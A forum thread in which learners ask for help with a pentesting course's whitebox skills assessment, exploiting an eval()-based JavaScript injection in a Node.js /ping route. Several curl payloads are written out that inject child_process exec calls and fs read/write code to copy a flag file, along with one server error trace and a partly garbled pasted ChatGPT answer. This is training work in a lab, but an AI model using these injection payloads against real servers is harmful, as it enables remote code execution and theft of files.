Whitebox Pentesting 101 Skills Assessment

Hi, may I request for some pointers for Whitebox Pentesting 101 Skills Assessment?

I asked for some help and was asked to re-do the module. However, I am still stuck after going through the module a few times. It seems that the /ping route is the entry point for the command execution. I understand that what I needed to do was to read a file on the remote server and write it to a file as stated in the hint.

For the following curl command, I am using “touch test” as an example to check if my understanding is correct for the payload? Also, if I were to use burpsuite repeater, do I need to change the Content-Type to “Content-Type: application/json” as well?

curl http://0.0.0.0:21440/ping -X POST -d '{"debug":true, "ip": "{"ip": "127.0.0.1"; const { exec } = require("child_process"); exec("touch test");};//"}' -H "Content-Type: application/json"

It seems like execFile() will only execute the ping command in the server side code and not possible to chain any other commands?

However, it also seems like the eval() function is using back ticks ` and the eval() function treats the template literal expression as JavaScript code and will executes it?

Or will this curl works?

curl http://0.0.0.0:21440/ping -X POST -d '{"debug":true, "ip": "{"ip": "127.0.0.1"}; const { exec } = require("child_process"); exec("touch test");//"}' -H "Content-Type: application/json"

I feel that I am going down a rabbit hole. I tried “touch test” on my local computer and the file “test” was not created. Any help will be greatly appreciated.

i haven’t done that module personally but this is what chatgpt spitted out for me, maybe it helps:
Whitebox pentesting, also known as ethical hacking, is an important skillset for identifying security vulnerabilities in software and systems. Based on your description, it seems you are attempting to exploit a command injection vulnerability in the /ping route of a web application. Here are some pointers to help you in your assessment:

  1. Exploiting Command Injection: Command injection occurs when an attacker can inject malicious commands into a system that executes arbitrary commands. In your case, it appears that injecting code into the ip parameter of the request can lead to command execution on the server.

  2. Payload Structure: Your payload should be crafted in a way that it gets executed as part of the JavaScript code on the server-side. In your example, you are attempting to execute the exec function from the child_process module to run a command. However, you have some syntax issues in your payload.

  3. Payload Syntax: To fix the syntax issues in your payload, you can use backticks () instead of double quotes (") around the command you want to execute. Here's an example using the whoami` command:

curl http://0.0.0.0:21440/ping -X POST -d '{"debug": true, "ip": "`whoami`"}' -H "Content-Type: application/json"

Make sure to adjust the payload according to the specific vulnerability you are exploiting.

  1. Content-Type Header: In your request, the Content-Type header is set to "Content-Type: application/json". If that’s the expected content type for the request, you should keep it as it is.

  2. Testing and Verification: After sending the payload, observe the response from the server. It should contain the output of the executed command (whoami in this case). If the response shows the command’s output, it means you have successfully exploited the command injection vulnerability.

Hi, thank you for taking time to find the information. I attempted to consult with chatgpt too but mostly with 3.5 only. It was a great learning experience understanding how JavaScript works.

I am new to JavaScript and while doing this module, I came to know that data parsed with JSON.parse() becomes a JavaScript object. The entry point was in an eval() function, parsed with JSON.parse() enclosed with back ticks already. Nevertheless, I will try point 3 again.

I’ve checked and the following POST json data seems to properly evenly close/open any brackets and quotes:

curl http://0.0.0.0:21440/ping -X POST -d '{"debug":true, "ip": "{\"ip\": \"127.0.0.1\"}; const { exec } = require(\"child_process\"); exec(\"touch test\");//"}' -H "Content-Type: application/json"

There are permission restriction on the remote server hence it is not possible to have any command output to verify if the payload eventually works.

I attempted again however still at a road block due to lack of understanding.

Firstly I am not sure if I got the payloads correctly. I derived at the payloads from the following 2 examples:

Example A1:

curl http://0.0.0.0:21440/ping -X POST -d ‘{“debug”:true, “ip”: “{"ip": "127.0.0.1"}” }’ -H “Content-Type: application/json”

Example A2:

curl http://0.0.0.0:21440/ping -X POST -d ‘{“debug”: true, “ip”: “127.0.0.1”}’ -H “Content-Type: application/json”

I observed that the POST data input was wrapped in single quotes ‘’ inside json.parse(‘’) and thereafter wrapped in backticks `` inside the eval() function. I did some searching and seems like I do not have to craft the payload to close/open them evenly. Please correct me if I am wrong.
Information from the web: “The backticks indicate a template literal, which allows the expressions to be embeded within the string using ${}. The expression ${req.body.ip} is wrapped within the template literal and will be evaluated as a JavaScript expression.”

Attempted payloads:
Lab URL: 64.227.46.56:30606/ping

curl http://64.227.46.56:30606/ping -X POST -d ‘{“debug”: true, “ip”: " "; const { exec } = require("child_process"); exec("cat style.css > output.txt"); //"}’ -H “Content-Type: application/json”
curl http://64.227.46.56:30606/ping -X POST -d ‘{“debug”: true, “ip”: " "; const { exec } = require("child_process"); exec("cat style.css > ./output.txt"); //"}’ -H “Content-Type: application/json”
curl http://64.227.46.56:30606/ping -X POST -d ‘{“debug”: true, “ip”: " "; const { exec } = require("child_process"); exec("cat style.css > /var/www/html/output.txt"); //"}’ -H “Content-Type: application/json”
curl http://64.227.46.56:30606/ping -X POST -d ‘{“debug”: true, “ip”: " "; const { exec } = require("child_process"); exec("cat style.css > /tmp/output.txt"); //"}’ -H “Content-Type: application/json”
curl http://64.227.46.56:30606/ping -X POST -d ‘{“debug”: true, “ip”: " "; const { exec } = require("child_process"); exec("cat /flag.txt > ./output.html"); //"}’ -H “Content-Type: application/json”

curl http://64.227.46.56:30606/ping -X POST -d ‘{“debug”: true, “ip”: " "; var fs = require(\"fs\"); fs.readFile(\"flag.txt\", \"utf8\", (err, data) => { fs.writeFile(\"output.html\", data, (err) => { if (err) throw err; }); }); //"}’ -H “Content-Type: application/json”

curl http://64.227.46.56:30606/ping -X POST -d ‘{“debug”:true, “ip”: “{"ip": "127.0.0.1"; var fs = require(\"fs\"); fs.readFile(\"flag.txt\", \"utf8\", (err, data) => { fs.writeFile(\"output.html\", data, (err) => { if (err) throw err; }); }); //”}’ -H “Content-Type: application/json”

Guys, I am hanging at the same problem.

I understand that command injection doesn’t work here:
kali@kali:~$ curl http://127.0.0.1:21440/ping -X POST -d 'debug=true&ip={"ip":"1.1.1.1;whoami"}'

So, I go over to JavaScript code injection and try to inject this one:

kali@kali:~$ curl http://127.0.0.1:21440/ping -X POST -d 'debug=true&ip={"ip":"1.1.1.1; const { exec } = require(\"child_process\"); exec(\"touch pwned\");"}'  
<!DOCTYPE html><head><meta charset="UTF-8"><title>Basic Linux Commands</title><link rel="stylesheet" href="./style.css"></head><form class="form" name="ping" method="post"><button class="btn block-cube block-cube-hover" type="submit" formaction="/whoami"><div class="bg-top"><div class="bg-inner"></div></div><div class="bg-right"><div class="bg-inner"></div></div><div class="bg"><div class="bg-inner"></div></div><div class="text">whoami</div></button><button class="btn block-cube block-cube-hover" type="submit" formaction="/hostname"><div class="bg-top"><div class="bg-inner"></div></div><div class="bg-right"><div class="bg-inner"></div></div><div class="bg"><div class="bg-inner"></div></div><div class="text">hostname</div></button><button class="btn block-cube block-cube-hover" type="submit" formaction="/ifconfig"><div class="bg-top"><div class="bg-inner"></div></div><div class="bg-right"><div class="bg-inner"></div></div><div class="bg"><div class="bg-inner"></div></div><div class="text">ifconfig</div></button><button class="btn block-cube block-cube-hover" type="submit" formaction="/ping"><div class="bg-top"><div class="bg-inner"></div></div><div class="bg-right"><div class="bg-inner"></div></div><div class="bg"><div class="bg-inner"></div></div><div class="text">ping</div></button></form><pre><code>something went wrong!</code></pre>

Unfortunately, the server replies with

kali@kali:~/server$ node server.js
Server is running on http://0.0.0.0:21440
Error: Failed to lookup view "Unexpected token c in JSON at position 42" in views directory "/home/kali/server/views"
    at Function.render (/home/kali/server/node_modules/express/lib/application.js:580:17)
    at ServerResponse.render (/home/kali/server/node_modules/express/lib/response.js:1012:7)
    at /home/kali/server/server.js:88:13
    at Layer.handle [as handle_request] (/home/kali/server/node_modules/express/lib/router/layer.js:95:5)
    at next (/home/kali/server/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/home/kali/server/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/home/kali/server/node_modules/express/lib/router/layer.js:95:5)
    at /home/kali/server/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/home/kali/server/node_modules/express/lib/router/index.js:335:12)
    at next (/home/kali/server/node_modules/express/lib/router/index.js:275:10)

So, I was pretty sure that I injected the corrected payload but somehow it’s not…

Can anybody help?

Dear brother, have you completed the module now, if you have completed it, can I ask you for help, if so, I hope you can tell me your discord account, I will add you as a friend.

Dear brother, have you completed the module now, if you have completed it, can I ask you for help, if so, I hope you can tell me your discord account, I will add you as a friend

Hi there, I worked through most of the module, but got stuck in the Skills Assessment and had to pause. If I can help you, sure! My discord is kruemel_71.

ok,I added you.